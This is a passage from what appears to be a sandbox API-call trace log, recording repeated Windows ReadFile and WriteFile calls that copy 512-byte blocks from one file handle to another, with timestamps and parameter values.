lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.260] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.261] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.261] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.262] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x205, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.262] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.263] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x25b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.263] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.264] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x283, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.264] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.265] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.265] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.265] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x271, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.266] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.267] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x275, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.267] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.267] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.268] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.268] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.269] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.269] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.270] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.270] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x287, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.271] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.271] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.272] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.272] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2be, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.273] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.273] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x291, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.274] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.274] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x287, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.275] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.275] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.276] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.276] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.277] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.277] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x285, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.278] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.278] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2aa, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.279] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.279] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.280] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.280] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ad, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.281] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.281] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.282] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.282] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.283] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.283] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.283] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.284] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x288, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.285] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.285] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x273, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.290] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.290] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x298, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.291] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.291] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.292] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.292] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.293] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.293] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.294] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.294] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.295] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.295] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.296] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.296] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.297] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.297] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.298] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.298] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.298] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.299] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.299] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.300] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.300] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.301] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.302] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.302] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ea, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.303] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.303] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x297, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.304] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.304] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.304] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.305] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x292, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.305] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.306] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.306] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.307] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.307] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.308] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x25c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.308] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.309] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.309] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.310] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2bf, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.310] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.311] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.311] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.312] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.312] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 